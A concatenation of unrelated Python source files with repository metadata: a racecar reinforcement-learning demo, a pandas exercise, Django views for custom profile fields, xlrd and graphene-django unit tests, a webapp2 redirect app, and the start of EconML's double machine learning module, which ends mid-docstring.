from pybullet_envs.bullet.racecarZEDGymEnv import RacecarZEDGymEnv
from baselines import deepq
def main():
  """Run a trained DQN policy in the ZED racecar env forever, rendering each step."""
  env = RacecarZEDGymEnv(renders=True)
  act = deepq.load("racecar_zed_model.pkl")
  print(act)
  # Endless evaluation loop: one episode per iteration until interrupted.
  while True:
    obs, done = env.reset(), False
    print("===================================")
    print("obs")
    print(obs)
    episode_rew = 0
    while not done:
      env.render()
      # obs[None] presumably adds a leading batch dimension for the policy
      # network; [0] unwraps the batched action -- TODO confirm.
      obs, rew, done, _ = env.step(act(obs[None])[0])
      episode_rew += rew
    print("Episode reward", episode_rew)
if __name__ == '__main__':
  main()
acf6cf3c0f6b8f45a53592c0af47e934dcf105cb | 420 | py | Python | Datacamp Assignments/Data Engineer Track/2. Streamlined Data Ingestion with pandas/30_work_with_json_orientation.py | Ali-Parandeh/Data_Science_Playground | c529e9b3692381572de259e7c93938d6611d83da | [
"MIT"
] | null | null | null | Datacamp Assignments/Data Engineer Track/2. Streamlined Data Ingestion with pandas/30_work_with_json_orientation.py | Ali-Parandeh/Data_Science_Playground | c529e9b3692381572de259e7c93938d6611d83da | [
"MIT"
] | null | null | null | Datacamp Assignments/Data Engineer Track/2. Streamlined Data Ingestion with pandas/30_work_with_json_orientation.py | Ali-Parandeh/Data_Science_Playground | c529e9b3692381572de259e7c93938d6611d83da | [
"MIT"
] | 1 | 2021-03-10T09:40:05.000Z | 2021-03-10T09:40:05.000Z | try:
# Load the JSON with orient specified
df = pd.read_json("dhs_report_reformatted.json",
orient='split')
# Plot total population in shelters over time
df["date_of_census"] = pd.to_datetime(df["date_of_census"])
df.plot(x="date_of_census",
y="total_individuals_in_shelter")
plt.show()
except ValueError:
print("pandas could not parse the JSON.") | 32.307692 | 63 | 0.640476 |
acf6d0159aa4faf68b55cfa43a6f20c49b29b310 | 7,683 | py | Python | zerver/views/custom_profile_fields.py | rmit-s3603315-benjamin-randall/SpecialEdd | 014fd2b220f52762848592cab90c493d1c77682d | [
"Apache-2.0"
] | null | null | null | zerver/views/custom_profile_fields.py | rmit-s3603315-benjamin-randall/SpecialEdd | 014fd2b220f52762848592cab90c493d1c77682d | [
"Apache-2.0"
] | 7 | 2020-09-06T14:54:30.000Z | 2022-02-10T18:51:14.000Z | zerver/views/custom_profile_fields.py | b-randall/SpecialEdd | 014fd2b220f52762848592cab90c493d1c77682d | [
"Apache-2.0"
] | 1 | 2018-10-13T04:20:36.000Z | 2018-10-13T04:20:36.000Z |
from typing import Union, List, Dict, Optional, cast
import logging
import ujson
from django.core.exceptions import ValidationError
from django.db import IntegrityError, connection
from django.http import HttpRequest, HttpResponse
from django.utils.translation import ugettext as _
from zerver.decorator import require_realm_admin, human_users_only
from zerver.lib.request import has_request_variables, REQ
from zerver.lib.actions import (try_add_realm_custom_profile_field,
do_remove_realm_custom_profile_field,
try_update_realm_custom_profile_field,
do_update_user_custom_profile_data,
try_reorder_realm_custom_profile_fields,
notify_user_update_custom_profile_data)
from zerver.lib.response import json_success, json_error
from zerver.lib.types import ProfileFieldData
from zerver.lib.validator import (check_dict, check_list, check_int,
validate_field_data, check_capped_string)
from zerver.models import (custom_profile_fields_for_realm, UserProfile, CustomProfileFieldValue,
CustomProfileField, custom_profile_fields_for_realm)
def list_realm_custom_profile_fields(request: HttpRequest, user_profile: UserProfile) -> HttpResponse:
    """Return every custom profile field defined for the requester's realm."""
    realm_fields = custom_profile_fields_for_realm(user_profile.realm_id)
    field_dicts = [field.as_dict() for field in realm_fields]
    return json_success({'custom_fields': field_dicts})
# Validator enforcing the maximum allowed length for a field's hint text.
hint_validator = check_capped_string(CustomProfileField.HINT_MAX_LENGTH)
@require_realm_admin
@has_request_variables
def create_realm_custom_profile_field(request: HttpRequest,
                                      user_profile: UserProfile, name: str=REQ(),
                                      hint: str=REQ(default=''),
                                      field_data: ProfileFieldData=REQ(default={},
                                                                       converter=ujson.loads),
                                      field_type: int=REQ(validator=check_int)) -> HttpResponse:
    """Create a new custom profile field on the requester's realm.

    Validates the name, hint, field type and field data before attempting
    creation; a duplicate field name is rejected with an error.
    """
    if not name.strip():
        return json_error(_("Name cannot be blank."))
    hint_error = hint_validator('hint', hint)
    if hint_error:
        return json_error(hint_error)
    valid_field_types = [choice[0] for choice in CustomProfileField.FIELD_TYPE_CHOICES]
    if field_type not in valid_field_types:
        return json_error(_("Invalid field type."))
    data_error = validate_field_data(field_data)
    if data_error:
        return json_error(data_error)
    try:
        created_field = try_add_realm_custom_profile_field(
            realm=user_profile.realm,
            name=name,
            field_data=field_data,
            field_type=field_type,
            hint=hint,
        )
    except IntegrityError:
        return json_error(_("A field with that name already exists."))
    return json_success({'id': created_field.id})
@require_realm_admin
def delete_realm_custom_profile_field(request: HttpRequest, user_profile: UserProfile,
                                      field_id: int) -> HttpResponse:
    """Delete a custom profile field from the requester's realm.

    Returns an error if no such field exists in this realm.
    """
    try:
        # Scope the lookup to the administrator's own realm; the original
        # bare `get(id=field_id)` would let a realm admin delete fields
        # belonging to other realms.  This also matches the lookups in
        # update_realm_custom_profile_field and
        # remove_user_custom_profile_data.
        field = CustomProfileField.objects.get(realm=user_profile.realm, id=field_id)
    except CustomProfileField.DoesNotExist:
        return json_error(_('Field id {id} not found.').format(id=field_id))
    do_remove_realm_custom_profile_field(realm=user_profile.realm,
                                         field=field)
    return json_success()
@require_realm_admin
@has_request_variables
def update_realm_custom_profile_field(request: HttpRequest, user_profile: UserProfile,
                                      field_id: int, name: str=REQ(),
                                      hint: str=REQ(default=''),
                                      field_data: ProfileFieldData=REQ(default={},
                                                                       converter=ujson.loads),
                                      ) -> HttpResponse:
    """Rename or reconfigure an existing custom profile field on the realm.

    Validates the new name, hint and field data, then applies the update;
    a name collision with another field is reported as an error.
    """
    if not name.strip():
        return json_error(_("Name cannot be blank."))
    hint_error = hint_validator('hint', hint)
    if hint_error:
        return json_error(hint_error, data={'field': 'hint'})
    data_error = validate_field_data(field_data)
    if data_error:
        return json_error(data_error)
    realm = user_profile.realm
    try:
        field = CustomProfileField.objects.get(realm=realm, id=field_id)
    except CustomProfileField.DoesNotExist:
        return json_error(_('Field id {id} not found.').format(id=field_id))
    try:
        try_update_realm_custom_profile_field(realm, field, name, hint=hint,
                                              field_data=field_data)
    except IntegrityError:
        return json_error(_('A field with that name already exists.'))
    return json_success()
@require_realm_admin
@has_request_variables
def reorder_realm_custom_profile_fields(request: HttpRequest, user_profile: UserProfile,
                                        order: List[int]=REQ(validator=check_list(
                                            check_int))) -> HttpResponse:
    # `order` is the full list of field ids in the desired display order;
    # validation of the ids and the actual reordering happen in the action helper.
    try_reorder_realm_custom_profile_fields(user_profile.realm, order)
    return json_success()
@human_users_only
@has_request_variables
def remove_user_custom_profile_data(request: HttpRequest, user_profile: UserProfile,
                                    data: List[int]=REQ(validator=check_list(
                                        check_int))) -> HttpResponse:
    """Clear the requesting user's values for the given custom profile fields.

    Unknown field ids are an error; fields the user never filled in are
    silently skipped.  Clients are notified of each cleared value.
    """
    for requested_field_id in data:
        try:
            field = CustomProfileField.objects.get(realm=user_profile.realm, id=requested_field_id)
        except CustomProfileField.DoesNotExist:
            return json_error(_('Field id {id} not found.').format(id=requested_field_id))
        try:
            existing_value = CustomProfileFieldValue.objects.get(field=field, user_profile=user_profile)
        except CustomProfileFieldValue.DoesNotExist:
            # The user has no stored value for this field; nothing to delete.
            continue
        existing_value.delete()
        notify_user_update_custom_profile_data(user_profile, {'id': requested_field_id, 'value': None})
    return json_success()
@human_users_only
@has_request_variables
def update_user_custom_profile_data(
        request: HttpRequest,
        user_profile: UserProfile,
        data: List[Dict[str, Union[int, str, List[int]]]]=REQ(validator=check_list(
            check_dict([('id', check_int)])))) -> HttpResponse:
    """Validate and store the requesting user's custom profile field values.

    Each item in `data` carries a field `id` and a `value`; every value is
    validated against its field's type before anything is written, so a
    single invalid value rejects the whole request.
    """
    for item in data:
        field_id = item['id']
        try:
            # Scope the lookup to the user's own realm, matching
            # remove_user_custom_profile_data; the original bare
            # `get(id=field_id)` accepted field ids from other realms.
            field = CustomProfileField.objects.get(realm=user_profile.realm, id=field_id)
        except CustomProfileField.DoesNotExist:
            return json_error(_('Field id {id} not found.').format(id=field_id))

        validators = CustomProfileField.FIELD_VALIDATORS
        field_type = field.field_type
        # str() is the direct equivalent of the old '{}'.format(field.name).
        var_name = str(field.name)
        value = item['value']
        if field_type in validators:
            # Simple scalar field types (text, date, URL, ...) share one
            # validator signature: (name, value).
            validator = validators[field_type]
            result = validator(var_name, value)
        elif field_type == CustomProfileField.CHOICE:
            # Choice fields additionally need the field's own option data.
            choice_field_validator = CustomProfileField.CHOICE_FIELD_VALIDATORS[field_type]
            field_data = field.field_data
            result = choice_field_validator(var_name, field_data, value)
        elif field_type == CustomProfileField.USER:
            # User fields hold a list of user ids within the realm.
            user_field_validator = CustomProfileField.USER_FIELD_VALIDATORS[field_type]
            result = user_field_validator(user_profile.realm.id, cast(List[int], value),
                                          False)
        else:
            raise AssertionError("Invalid field type")
        if result is not None:
            return json_error(result)

    do_update_user_custom_profile_data(user_profile, data)
    # We need to call this explicitly otherwise constraints are not checked.
    return json_success()
| 43.162921 | 102 | 0.639724 |
acf6d245b06f4d9ff86d82dd8d45d6aa9fcb6c6d | 2,323 | py | Python | handleExcel/exportor/scripts/xlrd-1.0.0/tests/test_formulas.py | Jack301/toolkit | 2d1e37a36281af7722be93d4d5299c1ce8b7f365 | [
"MIT"
] | 95 | 2016-09-30T02:55:26.000Z | 2022-01-12T05:47:30.000Z | handleExcel/exportor/scripts/xlrd-1.0.0/tests/test_formulas.py | Jack301/toolkit | 2d1e37a36281af7722be93d4d5299c1ce8b7f365 | [
"MIT"
] | 3 | 2017-08-03T07:37:09.000Z | 2018-04-13T11:47:09.000Z | handleExcel/exportor/scripts/xlrd-1.0.0/tests/test_formulas.py | Jack301/toolkit | 2d1e37a36281af7722be93d4d5299c1ce8b7f365 | [
"MIT"
] | 32 | 2017-03-28T06:45:09.000Z | 2021-12-21T10:33:10.000Z | # -*- coding: utf-8 -*-
# Portions Copyright (C) 2010, Manfred Moitzi under a BSD licence
from unittest import TestCase
import os
import sys
import xlrd
from .base import from_this_dir
# Python 3 provides an ``ascii`` builtin; on Python 2 it is missing, so we
# emulate it by stripping the leading ``u`` prefix from unicode reprs.
try:
    ascii
except NameError:
    def ascii(s):
        rep = repr(s)
        if rep[:2] in ('u"', "u'"):
            rep = rep[1:]
        return rep
class TestFormulas(TestCase):
    """Spot-check formula evaluation results read from formula_test_sjmachin.xls.

    Each test compares the ascii()-escaped repr of one cell's computed value
    against a hard-coded expectation.
    """

    def setUp(self):
        book = xlrd.open_workbook(from_this_dir('formula_test_sjmachin.xls'))
        self.sheet = book.sheet_by_index(0)

    def get_value(self, col, row):
        # Return the ascii()-escaped repr of the cell at (row, col);
        # col_values(col)[row] reads a whole column and indexes into it.
        return ascii(self.sheet.col_values(col)[row])

    def test_cell_B2(self):
        # Expected value is a non-ASCII (Cyrillic) string in escaped form.
        self.assertEqual(
            self.get_value(1, 1),
            r"'\u041c\u041e\u0421\u041a\u0412\u0410 \u041c\u043e\u0441\u043a\u0432\u0430'"
        )

    def test_cell_B3(self):
        self.assertEqual(self.get_value(1, 2), '0.14285714285714285')

    def test_cell_B4(self):
        self.assertEqual(self.get_value(1, 3), "'ABCDEF'")

    def test_cell_B5(self):
        self.assertEqual(self.get_value(1, 4), "''")

    def test_cell_B6(self):
        self.assertEqual(self.get_value(1, 5), '1')

    def test_cell_B7(self):
        self.assertEqual(self.get_value(1, 6), '7')

    def test_cell_B8(self):
        self.assertEqual(
            self.get_value(1, 7),
            r"'\u041c\u041e\u0421\u041a\u0412\u0410 \u041c\u043e\u0441\u043a\u0432\u0430'"
        )
class TestNameFormulas(TestCase):
    """Spot-check evaluation of named-formula cells in formula_test_names.xls."""

    def setUp(self):
        book = xlrd.open_workbook(from_this_dir('formula_test_names.xls'))
        self.sheet = book.sheet_by_index(0)

    def get_value(self, col, row):
        # Return the ascii()-escaped repr of the cell at (row, col).
        return ascii(self.sheet.col_values(col)[row])

    def test_unaryop(self):
        self.assertEqual(self.get_value(1, 1), '-7.0')

    def test_attrsum(self):
        self.assertEqual(self.get_value(1, 2), '4.0')

    def test_func(self):
        self.assertEqual(self.get_value(1, 3), '6.0')

    def test_func_var_args(self):
        self.assertEqual(self.get_value(1, 4), '3.0')

    def test_if(self):
        self.assertEqual(self.get_value(1, 5), "'b'")

    def test_choose(self):
        self.assertEqual(self.get_value(1, 6), "'C'")
acf6d2f54f3806149acae2613e2852e3050804cd | 1,102 | py | Python | tests/test_field.py | Dagurmart/graphene-django-plus-optimizer | dd9b32822b59b653fa29df955b0fffa41a0a9dad | [
"MIT"
] | null | null | null | tests/test_field.py | Dagurmart/graphene-django-plus-optimizer | dd9b32822b59b653fa29df955b0fffa41a0a9dad | [
"MIT"
] | null | null | null | tests/test_field.py | Dagurmart/graphene-django-plus-optimizer | dd9b32822b59b653fa29df955b0fffa41a0a9dad | [
"MIT"
] | null | null | null | import graphene_django_plus_optimizer as gql_optimizer
from .graphql_utils import create_resolve_info
from .models import (
Item,
)
from .schema import schema
from .test_utils import assert_query_equality
def test_should_optimize_non_django_field_if_it_has_an_optimization_hint_in_the_field():
    """A non-Django field with an optimization hint should trigger select_related."""
    info = create_resolve_info(schema, '''
        query {
            items(name: "bar") {
                id
                foo
                father {
                    id
                }
            }
        }
    ''')
    base_queryset = Item.objects.filter(name='bar')
    actual = gql_optimizer.query(base_queryset, info)
    expected = base_queryset.select_related('parent')
    assert_query_equality(actual, expected)
def test_should_optimize_with_only_hint():
    """An `only` hint on the field should restrict the fetched columns."""
    info = create_resolve_info(schema, '''
        query {
            items(name: "foo") {
                id
                title
            }
        }
    ''')
    base_queryset = Item.objects.filter(name='foo')
    actual = gql_optimizer.query(base_queryset, info)
    expected = base_queryset.only('id', 'name')
    assert_query_equality(actual, expected)
acf6d300053ff876711824e78791842ff7409ea3 | 868 | py | Python | main.py | jjdicharry/veogit_proxy | 1b8f9ab2c9fb84912d6239cd7d096249572187f8 | [
"Apache-2.0"
] | null | null | null | main.py | jjdicharry/veogit_proxy | 1b8f9ab2c9fb84912d6239cd7d096249572187f8 | [
"Apache-2.0"
] | null | null | null | main.py | jjdicharry/veogit_proxy | 1b8f9ab2c9fb84912d6239cd7d096249572187f8 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2021 Jeremiah Dicharry
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import webapp2
from config import debug_mode
from config import main_url
class HomeHandler(webapp2.RequestHandler):
    # Redirect all GET requests for this route to the configured main URL.
    def get(self):
        self.redirect(main_url)
# WSGI application mapping the site root to the redirect handler;
# debug mode is controlled by the imported config flag.
app = webapp2.WSGIApplication([
    (r"/", HomeHandler)
], debug=debug_mode)
| 28 | 74 | 0.754608 |
acf6d57ca2c2d07b78c1ccfa6022eededd49bf83 | 1,219 | py | Python | inaSpeechSegmenter/__init__.py | vancdk/inaSpeechSegmenter | eb22d8940f86f2917c7b8f6d0fd17c4fc73e2732 | [
"MIT"
] | 2 | 2022-01-27T18:35:32.000Z | 2022-01-28T11:40:26.000Z | inaSpeechSegmenter/__init__.py | vancdk/inaSpeechSegmenter | eb22d8940f86f2917c7b8f6d0fd17c4fc73e2732 | [
"MIT"
] | null | null | null | inaSpeechSegmenter/__init__.py | vancdk/inaSpeechSegmenter | eb22d8940f86f2917c7b8f6d0fd17c4fc73e2732 | [
"MIT"
] | 2 | 2020-06-28T11:12:56.000Z | 2021-08-25T08:30:14.000Z | #!/usr/bin/env python
# encoding: utf-8
# The MIT License
# Copyright (c) 2018 Ina (David Doukhan - http://www.ina.fr/)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from .segmenter import Segmenter, seg2csv
| 45.148148 | 79 | 0.772765 |
acf6d585f20e64a95cc5e54aaec56fce7a2745e9 | 53,276 | py | Python | econml/dml.py | knightrade/EconML | c918cc037c8e80201105c678f60a2c5ee9105c06 | [
"MIT"
] | 1 | 2020-09-03T08:59:11.000Z | 2020-09-03T08:59:11.000Z | econml/dml.py | knightrade/EconML | c918cc037c8e80201105c678f60a2c5ee9105c06 | [
"MIT"
] | null | null | null | econml/dml.py | knightrade/EconML | c918cc037c8e80201105c678f60a2c5ee9105c06 | [
"MIT"
] | null | null | null | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
"""Double Machine Learning. The method uses machine learning methods to identify the
part of the observed outcome and treatment that is not predictable by the controls X, W
(aka residual outcome and residual treatment).
Then estimates a CATE model by regressing the residual outcome on the residual treatment
in a manner that accounts for heterogeneity in the regression coefficient, with respect
to X.
References
----------
\\ V. Chernozhukov, D. Chetverikov, M. Demirer, E. Duflo, C. Hansen, and a. W. Newey.
Double Machine Learning for Treatment and Causal Parameters.
https://arxiv.org/abs/1608.00060, 2016.
\\ X. Nie and S. Wager.
Quasi-Oracle Estimation of Heterogeneous Treatment Effects.
arXiv preprint arXiv:1712.04912, 2017. URL http://arxiv.org/abs/1712.04912.
\\ V. Chernozhukov, M. Goldman, V. Semenova, and M. Taddy.
Orthogonal Machine Learning for Demand Estimation: High Dimensional Causal Inference in Dynamic Panels.
https://arxiv.org/abs/1712.09988, December 2017.
\\ V. Chernozhukov, D. Nekipelov, V. Semenova, and V. Syrgkanis.
Two-Stage Estimation with a High-Dimensional Second Stage.
https://arxiv.org/abs/1806.04823, 2018.
\\ Dylan Foster, Vasilis Syrgkanis (2019).
Orthogonal Statistical Learning.
ACM Conference on Learning Theory. https://arxiv.org/abs/1901.09036
"""
import numpy as np
import copy
from warnings import warn
from .utilities import (shape, reshape, ndim, hstack, cross_product, transpose, inverse_onehot,
broadcast_unit_treatments, reshape_treatmentwise_effects, add_intercept,
StatsModelsLinearRegression, LassoCVWrapper, check_high_dimensional)
from econml.sklearn_extensions.linear_model import MultiOutputDebiasedLasso, WeightedLassoCVWrapper
from econml.sklearn_extensions.ensemble import SubsampledHonestForest
from sklearn.model_selection import KFold, StratifiedKFold, check_cv
from sklearn.linear_model import LinearRegression, LassoCV, LogisticRegressionCV, ElasticNetCV
from sklearn.preprocessing import (PolynomialFeatures, LabelEncoder, OneHotEncoder,
FunctionTransformer)
from sklearn.base import clone, TransformerMixin
from sklearn.pipeline import Pipeline
from sklearn.utils import check_random_state
from .cate_estimator import (BaseCateEstimator, LinearCateEstimator,
TreatmentExpansionMixin, StatsModelsCateEstimatorMixin,
DebiasedLassoCateEstimatorMixin)
from .inference import StatsModelsInference, GenericSingleTreatmentModelFinalInference
from ._rlearner import _RLearner
from .sklearn_extensions.model_selection import WeightedStratifiedKFold
class _FirstStageWrapper:
    """Adapter around a user-supplied first-stage nuisance model.

    Wraps either the outcome model E[Y | X, W] (``is_Y=True``) or the
    treatment model E[T | X, W] (``is_Y=False``), handling the combination
    of X and W into one feature matrix, feature expansion for linear first
    stages, and one-hot/label conversions for discrete treatments.
    """

    def __init__(self, model, is_Y, featurizer, linear_first_stages, discrete_treatment):
        # Clone so each crossfitting fold gets an independent, unfitted copy.
        self._model = clone(model, safe=False)
        self._featurizer = clone(featurizer, safe=False)
        self._is_Y = is_Y
        self._linear_first_stages = linear_first_stages
        self._discrete_treatment = discrete_treatment

    def _combine(self, X, W, n_samples, fitting=True):
        # Build the regressor matrix from X and W for the first-stage model.
        if X is None:
            # if both X and W are None, just return a column of ones
            return (W if W is not None else np.ones((n_samples, 1)))
        XW = hstack([X, W]) if W is not None else X
        if self._is_Y and self._linear_first_stages:
            if self._featurizer is None:
                F = X
            else:
                F = self._featurizer.fit_transform(X) if fitting else self._featurizer.transform(X)
            # For a linear outcome model, expand to the cross product of
            # (X, W) with (1, phi(X)) so the linear first stage can represent
            # the heterogeneous-effect terms of the CATE model.
            return cross_product(XW, hstack([np.ones((shape(XW)[0], 1)), F]))
        else:
            return XW

    def fit(self, X, W, Target, sample_weight=None):
        # Fit the wrapped model on the combined (X, W) features.
        if (not self._is_Y) and self._discrete_treatment:
            # In this case, the Target is the one-hot-encoding of the treatment variable
            # We need to go back to the label representation of the one-hot so as to call
            # the classifier.
            # An all-zero column means some non-baseline treatment is absent
            # from this training split; no all-zero row means the baseline
            # treatment is absent.  Either way the fold is unusable.
            if np.any(np.all(Target == 0, axis=0)) or (not np.any(np.all(Target == 0, axis=1))):
                raise AttributeError("Provided crossfit folds contain training splits that " +
                                     "don't contain all treatments")
            Target = inverse_onehot(Target)

        if sample_weight is not None:
            self._model.fit(self._combine(X, W, Target.shape[0]), Target, sample_weight=sample_weight)
        else:
            self._model.fit(self._combine(X, W, Target.shape[0]), Target)

    def predict(self, X, W):
        # Predict E[Target | X, W]; for discrete treatments return the
        # class probabilities with the baseline (first) column dropped,
        # matching the one-hot encoding used downstream.
        n_samples = X.shape[0] if X is not None else (W.shape[0] if W is not None else 1)
        if (not self._is_Y) and self._discrete_treatment:
            return self._model.predict_proba(self._combine(X, W, n_samples, fitting=False))[:, 1:]
        else:
            return self._model.predict(self._combine(X, W, n_samples, fitting=False))

    def score(self, X, W, Target, sample_weight=None):
        # Delegate to the wrapped model's score if it has one; returns None
        # otherwise so callers can skip scoring.
        if hasattr(self._model, 'score'):
            if (not self._is_Y) and self._discrete_treatment:
                # In this case, the Target is the one-hot-encoding of the treatment variable
                # We need to go back to the label representation of the one-hot so as to call
                # the classifier.
                Target = inverse_onehot(Target)
            if sample_weight is not None:
                return self._model.score(self._combine(X, W, Target.shape[0]), Target, sample_weight=sample_weight)
            else:
                return self._model.score(self._combine(X, W, Target.shape[0]), Target)
        else:
            return None
class _FinalWrapper:
    """Adapter around the final-stage CATE model.

    Fits the model on residualized (Y, T) either directly (regressing Y_res
    on phi(X) ⊗ T_res) or via the sample-weighting trick (regressing
    Y_res / T_res on phi(X) with weights T_res**2), and handles the optional
    CATE intercept via a feature-transform wrapper.
    """

    def __init__(self, model_final, fit_cate_intercept, featurizer, use_weight_trick):
        self._model = clone(model_final, safe=False)
        self._use_weight_trick = use_weight_trick
        self._original_featurizer = clone(featurizer, safe=False)
        if self._use_weight_trick:
            # The weight trick has no place for an explicit intercept column.
            self._fit_cate_intercept = False
            self._featurizer = self._original_featurizer
        else:
            self._fit_cate_intercept = fit_cate_intercept
            if self._fit_cate_intercept:
                # Prepend a constant column so the intercept becomes part of
                # the final model's coefficient vector.
                add_intercept_trans = FunctionTransformer(add_intercept,
                                                          validate=True)
                if featurizer:
                    self._featurizer = Pipeline([('featurize', self._original_featurizer),
                                                 ('add_intercept', add_intercept_trans)])
                else:
                    self._featurizer = add_intercept_trans
            else:
                self._featurizer = self._original_featurizer

    def _combine(self, X, T, fitting=True):
        # Build the final-stage regressors phi(X) ⊗ T (cross product of the
        # featurized X with the treatment matrix).
        if X is not None:
            if self._featurizer is not None:
                F = self._featurizer.fit_transform(X) if fitting else self._featurizer.transform(X)
            else:
                F = X
        else:
            if not self._fit_cate_intercept:
                if self._use_weight_trick:
                    raise AttributeError("Cannot use this method with X=None. Consider "
                                         "using the LinearDMLCateEstimator.")
                else:
                    raise AttributeError("Cannot have X=None and also not allow for a CATE intercept!")
            # With no X, the only feature is the constant intercept column.
            F = np.ones((T.shape[0], 1))
        return cross_product(F, T)

    def fit(self, X, T_res, Y_res, sample_weight=None, sample_var=None):
        # Track training dimensions to see if Y or T is a vector instead of a 2-dimensional array
        self._d_t = shape(T_res)[1:]
        self._d_y = shape(Y_res)[1:]
        if not self._use_weight_trick:
            fts = self._combine(X, T_res)
            if sample_weight is not None:
                if sample_var is not None:
                    self._model.fit(fts,
                                    Y_res, sample_weight=sample_weight, sample_var=sample_var)
                else:
                    self._model.fit(fts,
                                    Y_res, sample_weight=sample_weight)
            else:
                self._model.fit(fts, Y_res)

            # Detect an (unwanted) intercept in the fitted model by predicting
            # on an all-zero feature row; if present, it will be subtracted
            # from every later prediction.
            self._intercept = None
            intercept = self._model.predict(np.zeros_like(fts[0:1]))
            if (np.count_nonzero(intercept) > 0):
                warn("The final model has a nonzero intercept for at least one outcome; "
                     "it will be subtracted, but consider fitting a model without an intercept if possible.",
                     UserWarning)
                self._intercept = intercept
        elif not self._fit_cate_intercept:
            # Sample-weighting trick: only valid for a single treatment column.
            if (np.ndim(T_res) > 1) and (self._d_t[0] > 1):
                raise AttributeError("This method can only be used with single-dimensional continuous treatment "
                                     "or binary categorical treatment.")
            F = self._combine(X, np.ones(T_res.shape[0]))
            self._intercept = None
            T_res = T_res.ravel()
            # Clip |T_res| away from zero (keeping its sign) so the division
            # below is numerically stable; zeros are treated as +1e-5.
            sign_T_res = np.sign(T_res)
            sign_T_res[(sign_T_res < 1) & (sign_T_res > -1)] = 1
            clipped_T_res = sign_T_res * np.clip(np.abs(T_res), 1e-5, np.inf)
            if np.ndim(Y_res) > 1:
                clipped_T_res = clipped_T_res.reshape(-1, 1)
            # Regress Y_res / T_res on phi(X) with weights T_res**2 — algebraically
            # equivalent to the residual-on-residual square loss.
            target = Y_res / clipped_T_res
            target_var = sample_var / clipped_T_res**2 if sample_var is not None else None
            if sample_weight is not None:
                if target_var is not None:
                    self._model.fit(F, target, sample_weight=sample_weight * T_res.flatten()**2,
                                    sample_var=target_var)
                else:
                    self._model.fit(F, target, sample_weight=sample_weight * T_res.flatten()**2)
            else:
                self._model.fit(F, target, sample_weight=T_res.flatten()**2)
        else:
            raise AttributeError("This combination is not a feasible one!")

    def predict(self, X):
        # Evaluate the constant marginal CATE at X by predicting under each
        # unit-vector treatment and reshaping to (n, d_y, d_t).
        X2, T = broadcast_unit_treatments(X if X is not None else np.empty((1, 0)),
                                          self._d_t[0] if self._d_t else 1)
        # This works both with or without the weighting trick as the treatments T are unit vector
        # treatments. And in the case of a weighting trick we also know that treatment is single-dimensional
        prediction = self._model.predict(self._combine(None if X is None else X2, T, fitting=False))
        if self._intercept is not None:
            prediction -= self._intercept
        return reshape_treatmentwise_effects(prediction,
                                             self._d_t, self._d_y)
class _BaseDMLCateEstimator(_RLearner):
    """Accessor base for DML CATE estimators.

    Exposes the internal fitted objects (final model, first-stage models,
    featurizers) of a DML estimator; shared by the parametric and
    non-parametric DML variants.
    """
    # A helper class that access all the internal fitted objects of a DML Cate Estimator. Used by
    # both Parametric and Non Parametric DML.

    @property
    def original_featurizer(self):
        # The user-provided featurizer, without any intercept-adding wrapper.
        return super().model_final._original_featurizer

    @property
    def featurizer(self):
        # NOTE This is used by the inference methods and has to be the overall featurizer. intended
        # for internal use by the library
        return super().model_final._featurizer

    @property
    def model_final(self):
        # NOTE This is used by the inference methods and is more for internal use to the library
        return super().model_final._model

    @property
    def model_cate(self):
        """
        Get the fitted final CATE model.

        Returns
        -------
        model_cate: object of type(model_final)
            An instance of the model_final object that was fitted after calling fit which corresponds
            to the constant marginal CATE model.
        """
        return super().model_final._model

    @property
    def models_y(self):
        """
        Get the fitted models for E[Y | X, W].

        Returns
        -------
        models_y: list of objects of type(`model_y`)
            A list of instances of the `model_y` object. Each element corresponds to a crossfitting
            fold and is the model instance that was fitted for that training fold.
        """
        return [mdl._model for mdl in super().models_y]

    @property
    def models_t(self):
        """
        Get the fitted models for E[T | X, W].

        Returns
        -------
        models_y: list of objects of type(`model_t`)
            A list of instances of the `model_y` object. Each element corresponds to a crossfitting
            fold and is the model instance that was fitted for that training fold.
        """
        return [mdl._model for mdl in super().models_t]

    def cate_feature_names(self, input_feature_names=None):
        """
        Get the output feature names.

        Parameters
        ----------
        input_feature_names: list of strings of length X.shape[1] or None
            The names of the input features

        Returns
        -------
        out_feature_names: list of strings or None
            The names of the output features :math:`\\phi(X)`, i.e. the features with respect to which the
            final constant marginal CATE model is linear. It is the names of the features that are associated
            with each entry of the :meth:`coef_` parameter. Not available when the featurizer is not None and
            does not have a method: `get_feature_names(input_feature_names)`. Otherwise None is returned.
        """
        if self.original_featurizer is None:
            return input_feature_names
        elif hasattr(self.original_featurizer, 'get_feature_names'):
            return self.original_featurizer.get_feature_names(input_feature_names)
        else:
            raise AttributeError("Featurizer does not have a method: get_feature_names!")
class DMLCateEstimator(_BaseDMLCateEstimator):
    """
    The base class for parametric Double ML estimators. The estimator is a special
    case of an :class:`._RLearner` estimator, which in turn is a special case
    of an :class:`_OrthoLearner` estimator, so it follows the two
    stage process, where a set of nuisance functions are estimated in the first stage in a crossfitting
    manner and a final stage estimates the CATE model. See the documentation of
    :class:`._OrthoLearner` for a description of this two stage process.

